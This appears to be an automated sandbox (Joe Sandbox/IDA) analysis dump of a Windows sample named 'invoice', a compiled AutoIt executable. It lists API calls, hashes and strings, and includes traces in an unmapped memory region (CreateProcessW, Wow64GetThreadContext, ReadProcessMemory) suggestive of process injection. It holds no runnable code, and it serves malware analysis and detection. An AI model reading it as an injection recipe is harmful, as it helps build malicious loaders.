                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                        • String ID: This is a third-party compiled AutoIt script.$runas
                        • API String ID: 529118366-3287110873
                        • Opcode ID: 3e1e786e39f17ae35bf11a5fccb1f53c19aa778b7f0ef670c32384b19233b318
                        • Instruction ID: 81ed613dff3c224aab7119fa2b56905679346ff5154f2ef9a9150275d8c8fdf3
                        • Opcode Fuzzy Hash: 3e1e786e39f17ae35bf11a5fccb1f53c19aa778b7f0ef670c32384b19233b318
                        • Instruction Fuzzy Hash: 2C5159B1E04249ABCF21FBB4DD82EFD7BB8AB06700F004069F491A6151DA7D5605FB21
                        APIs
                        • GetVersionExW.KERNEL32(?), ref: 00F84B2B
                          • Part of subcall function 00F87D2C: _memmove.LIBCMT ref: 00F87D66
                        • GetCurrentProcess.KERNEL32(?,0100FAEC,00000000,00000000,?), ref: 00F84BF8
                        • IsWow64Process.KERNEL32(00000000), ref: 00F84BFF
                        • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00F84C45
                        • FreeLibrary.KERNEL32(00000000), ref: 00F84C50
                        • GetSystemInfo.KERNEL32(00000000), ref: 00F84C81
                        • GetSystemInfo.KERNEL32(00000000), ref: 00F84C8D
                        Similarity
                        • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                        • String ID:
                        • API String ID: 1986165174-0
                        • Opcode ID: ed6f7fd6800b885d55c3a9871fba614fb62d1ff7ebbe0646f62aa62b8e08b6ca
                        • Instruction ID: ee5ed8844b1cbcb8b4642769a62c07c564065c13fec4cb7a51f20f9323c1c74d
                        • Opcode Fuzzy Hash: ed6f7fd6800b885d55c3a9871fba614fb62d1ff7ebbe0646f62aa62b8e08b6ca
                        • Instruction Fuzzy Hash: 9191D63194A7C1DEC731DB6884512EAFFE4AF66310B48499DD0CB93A41D224F948EB1A
                        APIs
                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00F84EEE,?,?,00000000,00000000), ref: 00F84FF9
                        • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00F84EEE,?,?,00000000,00000000), ref: 00F85010
                        • LoadResource.KERNEL32(?,00000000,?,?,00F84EEE,?,?,00000000,00000000,?,?,?,?,?,?,00F84F8F), ref: 00FBDC90
                        • SizeofResource.KERNEL32(?,00000000,?,?,00F84EEE,?,?,00000000,00000000,?,?,?,?,?,?,00F84F8F), ref: 00FBDCA5
                        • LockResource.KERNEL32(00F84EEE,?,?,00F84EEE,?,?,00000000,00000000,?,?,?,?,?,?,00F84F8F,00000000), ref: 00FBDCB8
                        Similarity
                        • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                        • String ID: SCRIPT
                        • API String ID: 3051347437-3967369404
                        • Opcode ID: 5e5a2ce5177be52464f5f21987ecead8a254e79db2ca29abb7ead819939b8064
                        • Instruction ID: 7a134520949df7fb4fc20147a8fdeb31a44ca5db27cc45061dc5a17f1a16fe79
                        • Opcode Fuzzy Hash: 5e5a2ce5177be52464f5f21987ecead8a254e79db2ca29abb7ead819939b8064
                        • Instruction Fuzzy Hash: A1115E75600702AFD7329B65DC48FA77BB9EBC9B51F20416CF44596250DB62E800A760
                        Similarity
                        • API ID: BuffCharUpper
                        • String ID:
                        • API String ID: 3964851224-0
                        • Opcode ID: 24c4b8c9a9a7cc58cdfc3f60c15ab6504555b8f25af2cbb4f1d2fff5335f0af7
                        • Instruction ID: 98d530e4005a3f8d8e03bbe06a7cb4118cbbecacfe1ba44fbabe9e834835fd8a
                        • Opcode Fuzzy Hash: 24c4b8c9a9a7cc58cdfc3f60c15ab6504555b8f25af2cbb4f1d2fff5335f0af7
                        • Instruction Fuzzy Hash: 3192AC71A083418FEB24DF14C991B6AB7E1BF84314F14892DF88A8B351DB75EC45EB92
                        APIs
                        • GetFileAttributesW.KERNELBASE(?,00FBE6F1), ref: 00FE44AB
                        • FindFirstFileW.KERNELBASE(?,?), ref: 00FE44BC
                        • FindClose.KERNEL32(00000000), ref: 00FE44CC
                        Similarity
                        • API ID: FileFind$AttributesCloseFirst
                        • String ID:
                        • API String ID: 48322524-0
                        • Opcode ID: 9ada58c725e0ae16bd2afafe39050fd083b1ab25c228348603100e2290fb2d69
                        • Instruction ID: 966572ba95db62fb36c8f1c39bbd55983582339f338b967ce6a01f31602a8718
                        • Opcode Fuzzy Hash: 9ada58c725e0ae16bd2afafe39050fd083b1ab25c228348603100e2290fb2d69
                        • Instruction Fuzzy Hash: 02E02632D108026B9230E738EC0D9EA779CAE45335F10470AFD75C20C0EB78AD10A7D6
                        Strings
                        • Variable must be of type 'Object'., xrefs: 00FC41BB
                        Similarity
                        • API ID:
                        • String ID: Variable must be of type 'Object'.
                        • API String ID: 0-109567571
                        • Opcode ID: 2c23cebb6537821367f2ac4e73457b163e52c0620a0f69db70f93d02d2437bfd
                        • Instruction ID: 0f8f3465c8f9468405e128c145659c8dc82e2b7baa549099c7ca78962c9a8b99
                        • Opcode Fuzzy Hash: 2c23cebb6537821367f2ac4e73457b163e52c0620a0f69db70f93d02d2437bfd
                        • Instruction Fuzzy Hash: FCA28A75E00205CFCB24EF58C981AEAB7B1FB59310F248069E946AB351D775EC46EB90
                        APIs
                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F90BBB
                        • timeGetTime.WINMM ref: 00F90E76
                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F90FB3
                        • Sleep.KERNEL32(0000000A), ref: 00F90FC1
                        • LockWindowUpdate.USER32(00000000,?,?), ref: 00F9105A
                        • DestroyWindow.USER32 ref: 00F91066
                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00F91080
                        • Sleep.KERNEL32(0000000A,?,?), ref: 00FC51DC
                        • TranslateMessage.USER32(?), ref: 00FC5FB9
                        • DispatchMessageW.USER32(?), ref: 00FC5FC7
                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00FC5FDB
                        Similarity
                        • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                        • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                        • API String ID: 4212290369-3242690629
                        • Opcode ID: 18b951fc499832bff3e2c8b3f46800c073732475dd8ae6acc3581e42dd4377d4
                        • Instruction ID: 441b1559f64c963291ca193bc614da622b44a4563bd619c259d9730415a42dad
                        • Opcode Fuzzy Hash: 18b951fc499832bff3e2c8b3f46800c073732475dd8ae6acc3581e42dd4377d4
                        • Instruction Fuzzy Hash: F1B20570A08742DFDB24DF24C985FAAB7E5FF84714F14491DE48987291CB79E884EB82
                        APIs
                          • Part of subcall function 00FE9008: __time64.LIBCMT ref: 00FE9012
                          • Part of subcall function 00F85045: _fseek.LIBCMT ref: 00F8505D
                        • __wsplitpath.LIBCMT ref: 00FE92DD
                          • Part of subcall function 00FA426E: __wsplitpath_helper.LIBCMT ref: 00FA42AE
                        • _wcscpy.LIBCMT ref: 00FE92F0
                        • _wcscat.LIBCMT ref: 00FE9303
                        • __wsplitpath.LIBCMT ref: 00FE9328
                        • _wcscat.LIBCMT ref: 00FE933E
                        • _wcscat.LIBCMT ref: 00FE9351
                          • Part of subcall function 00FE904E: _memmove.LIBCMT ref: 00FE9087
                          • Part of subcall function 00FE904E: _memmove.LIBCMT ref: 00FE9096
                        • _wcscmp.LIBCMT ref: 00FE9298
                          • Part of subcall function 00FE97DD: _wcscmp.LIBCMT ref: 00FE98CD
                          • Part of subcall function 00FE97DD: _wcscmp.LIBCMT ref: 00FE98E0
                        • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00FE94FB
                        • _wcsncpy.LIBCMT ref: 00FE956E
                        • DeleteFileW.KERNEL32(?,?), ref: 00FE95A4
                        • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00FE95BA
                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00FE95CB
                        • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00FE95DD
                        Similarity
                        • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                        • String ID:
                        • API String ID: 1500180987-0
                        • Opcode ID: ab8126da846de6bac11c5f6601d4bd8b835108777293db7638ab1e890c7c934b
                        • Instruction ID: c51d9e0e56feded3649cb9394bca82d09f64089352926a6627316dd5b5722831
                        • Opcode Fuzzy Hash: ab8126da846de6bac11c5f6601d4bd8b835108777293db7638ab1e890c7c934b
                        • Instruction Fuzzy Hash: 4FC15BB1E04219AFCF21EF95CC85ADEB7BDEF45310F0040AAF609E6141EB749A449F65
                        APIs
                        • GetSysColorBrush.USER32(0000000F), ref: 00F83074
                        • RegisterClassExW.USER32(00000030), ref: 00F8309E
                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00F830AF
                        • InitCommonControlsEx.COMCTL32(?), ref: 00F830CC
                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00F830DC
                        • LoadIconW.USER32(000000A9), ref: 00F830F2
                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00F83101
                        Similarity
                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                        • API String ID: 2914291525-1005189915
                        • Opcode ID: 46e9b4f1e66b703c1cbb4ccaa1a5228f6933bd7958900047d7cd57358098a773
                        • Instruction ID: 19a025ccece19aba0bc153c371f1d62766479a7b467474723e1cc88c519ff8b1
                        • Opcode Fuzzy Hash: 46e9b4f1e66b703c1cbb4ccaa1a5228f6933bd7958900047d7cd57358098a773
                        • Instruction Fuzzy Hash: 2D3108B594130AAFEB61CFA4D984ACDBBF4FB09710F10411EE5C0E6294D7BA0585DF51
                        APIs
                        • GetSysColorBrush.USER32(0000000F), ref: 00F83074
                        • RegisterClassExW.USER32(00000030), ref: 00F8309E
                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00F830AF
                        • InitCommonControlsEx.COMCTL32(?), ref: 00F830CC
                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00F830DC
                        • LoadIconW.USER32(000000A9), ref: 00F830F2
                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00F83101
                        Similarity
                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                        • API String ID: 2914291525-1005189915
                        • Opcode ID: 9c245e5bf9d2dcc8e85d573eaeff51fccdccd026f318fc50ed43770a7f11f7e7
                        • Instruction ID: 6d177253427832c3a9c82a9df880f000d24cdd19a2710622a817d77203c05fac
                        • Opcode Fuzzy Hash: 9c245e5bf9d2dcc8e85d573eaeff51fccdccd026f318fc50ed43770a7f11f7e7
                        • Instruction Fuzzy Hash: A521F4B5900209AFEB21DFA4E988BDDBBF4FB08700F00411AF990E6284DBBA45449F91
                        APIs
                          • Part of subcall function 00F84864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,010452F8,?,00F837C0,?), ref: 00F84882
                          • Part of subcall function 00FA068B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00F872C5), ref: 00FA06AD
                        • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00F87308
                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00FBEC21
                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00FBEC62
                        • RegCloseKey.ADVAPI32(?), ref: 00FBECA0
                        • _wcscat.LIBCMT ref: 00FBECF9
                        Similarity
                        • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                        • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                        • API String ID: 2673923337-2727554177
                        • Opcode ID: 3c4f742a9562d1f65b619952e40ed646ae9e0608bcb62535aa9e503ca153f2cb
                        • Instruction ID: a4f58f5473d2f25ad735d6ca8edc5fe6fd8e3d240c5730674818885d74fb6373
                        • Opcode Fuzzy Hash: 3c4f742a9562d1f65b619952e40ed646ae9e0608bcb62535aa9e503ca153f2cb
                        • Instruction Fuzzy Hash: 0971AFB1508701AFC324EF65DA819DBBBE8FF8A710F40042EF48483164EB3AD948EB51
                        APIs
                        • GetSysColorBrush.USER32(0000000F), ref: 00F83A62
                        • LoadCursorW.USER32(00000000,00007F00), ref: 00F83A71
                        • LoadIconW.USER32(00000063), ref: 00F83A88
                        • LoadIconW.USER32(000000A4), ref: 00F83A9A
                        • LoadIconW.USER32(000000A2), ref: 00F83AAC
                        • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00F83AD2
                        • RegisterClassExW.USER32(?), ref: 00F83B28
                          • Part of subcall function 00F83041: GetSysColorBrush.USER32(0000000F), ref: 00F83074
                          • Part of subcall function 00F83041: RegisterClassExW.USER32(00000030), ref: 00F8309E
                          • Part of subcall function 00F83041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00F830AF
                          • Part of subcall function 00F83041: InitCommonControlsEx.COMCTL32(?), ref: 00F830CC
                          • Part of subcall function 00F83041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00F830DC
                          • Part of subcall function 00F83041: LoadIconW.USER32(000000A9), ref: 00F830F2
                          • Part of subcall function 00F83041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00F83101
                        Similarity
                        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                        • String ID: #$0$AutoIt v3
                        • API String ID: 423443420-4155596026
                        • Opcode ID: b79aa2638b8e84c87663f4adbdf0b86dffa8edbf6ad5806ab1c077a4a2eb5f96
                        • Instruction ID: 6597404cfa133f34fd66c9b866e6f1d9a6afe2b6cb3a7e195ff3199f90330cce
                        • Opcode Fuzzy Hash: b79aa2638b8e84c87663f4adbdf0b86dffa8edbf6ad5806ab1c077a4a2eb5f96
                        • Instruction Fuzzy Hash: DD215EB5D00305AFEB31DFA4EE89B9D7BB4FB09711F00011AF584A6295D3BA56409F85
                        APIs
                        • DefWindowProcW.USER32(?,?,?,?), ref: 00F836D2
                        • KillTimer.USER32(?,00000001), ref: 00F836FC
                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00F8371F
                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00F8372A
                        • CreatePopupMenu.USER32 ref: 00F8373E
                        • PostQuitMessage.USER32(00000000), ref: 00F8375F
                        Similarity
                        • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                        • String ID: TaskbarCreated
                        • API String ID: 129472671-2362178303
                        • Opcode ID: a7823f79306d78cdc3f5fef05b7857a1d191c8e7cd901c53f25bbf5423b78349
                        • Instruction ID: 7e4b363abc7cb57ad95c5301d4921e54a79c3b4652e1887408db8c3903d5c28a
                        • Opcode Fuzzy Hash: a7823f79306d78cdc3f5fef05b7857a1d191c8e7cd901c53f25bbf5423b78349
                        • Instruction Fuzzy Hash: 674135F2604106BBEB307B68DD89BFD3755FB01710F100529F982D62A5EA6ADE00B762
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                        • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                        • API String ID: 1825951767-3513169116
                        APIs
                        • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 0152DC99
                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0152DEBF
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719820104.000000000152B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0152B000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_152b000_invoice.jbxd
                        Similarity
                        • API ID: CreateFileFreeVirtual
                        • String ID:
                        • API String ID: 204039940-0
                        APIs
                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00F83A15
                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00F83A36
                        • ShowWindow.USER32(00000000,?,?), ref: 00F83A4A
                        • ShowWindow.USER32(00000000,?,?), ref: 00F83A53
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Window$CreateShow
                        • String ID: AutoIt v3$edit
                        • API String ID: 1584632944-3779509399
                        APIs
                          • Part of subcall function 0152D898: Sleep.KERNELBASE(000001F4), ref: 0152D8A9
                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0152DABB
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719820104.000000000152B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0152B000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_152b000_invoice.jbxd
                        Similarity
                        • API ID: CreateFileSleep
                        • String ID: PTD12EEZSXSP5K9UR
                        • API String ID: 2694422964-2959788194
                        APIs
                        • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00FBD51C
                          • Part of subcall function 00F87D2C: _memmove.LIBCMT ref: 00F87D66
                        • _memset.LIBCMT ref: 00F8418D
                        • _wcscpy.LIBCMT ref: 00F841E1
                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00F841F1
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                        • String ID: Line:
                        • API String ID: 3942752672-1585850449
                        APIs
                          • Part of subcall function 00F84F3D: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,010452F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00F84F6F
                        • _free.LIBCMT ref: 00FBE5BC
                        • _free.LIBCMT ref: 00FBE603
                          • Part of subcall function 00F86BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00F86D0D
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: _free$CurrentDirectoryLibraryLoad
                        • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                        • API String ID: 2861923089-1757145024
                        APIs
                        • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00F835A1,SwapMouseButtons,00000004,?), ref: 00F835D4
                        • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00F835A1,SwapMouseButtons,00000004,?,?,?,?,00F82754), ref: 00F835F5
                        • RegCloseKey.KERNELBASE(00000000,?,?,00F835A1,SwapMouseButtons,00000004,?,?,?,?,00F82754), ref: 00F83617
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: CloseOpenQueryValue
                        • String ID: Control Panel\Mouse
                        • API String ID: 3677997916-824357125
                        APIs
                        • CreateProcessW.KERNELBASE(?,00000000), ref: 0152D053
                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 0152D0E9
                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0152D10B
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719820104.000000000152B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0152B000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_152b000_invoice.jbxd
                        Similarity
                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                        • String ID:
                        • API String ID: 2438371351-0
                        APIs
                          • Part of subcall function 00F85045: _fseek.LIBCMT ref: 00F8505D
                          • Part of subcall function 00FE97DD: _wcscmp.LIBCMT ref: 00FE98CD
                          • Part of subcall function 00FE97DD: _wcscmp.LIBCMT ref: 00FE98E0
                        • _free.LIBCMT ref: 00FE974B
                        • _free.LIBCMT ref: 00FE9752
                        • _free.LIBCMT ref: 00FE97BD
                          • Part of subcall function 00FA2ED5: RtlFreeHeap.NTDLL(00000000,00000000,?,00FA9BA4), ref: 00FA2EE9
                          • Part of subcall function 00FA2ED5: GetLastError.KERNEL32(00000000,?,00FA9BA4), ref: 00FA2EFB
                        • _free.LIBCMT ref: 00FE97C5
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                        • String ID:
                        • API String ID: 1552873950-0
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                        • String ID:
                        • API String ID: 2782032738-0
                        APIs
                        • _memset.LIBCMT ref: 00FBED92
                        • GetOpenFileNameW.COMDLG32(?), ref: 00FBEDDC
                          • Part of subcall function 00F848AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F848A1,?,?,00F837C0,?), ref: 00F848CE
                          • Part of subcall function 00FA0911: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00FA0930
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Name$Path$FileFullLongOpen_memset
                        • String ID: X
                        • API String ID: 3777226403-3081909835
                        APIs
                        • GetTempPathW.KERNEL32(00000104,?), ref: 00FE99A1
                        • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00FE99B8
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Temp$FileNamePath
                        • String ID: aut
                        • API String ID: 3285503233-3010740371
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
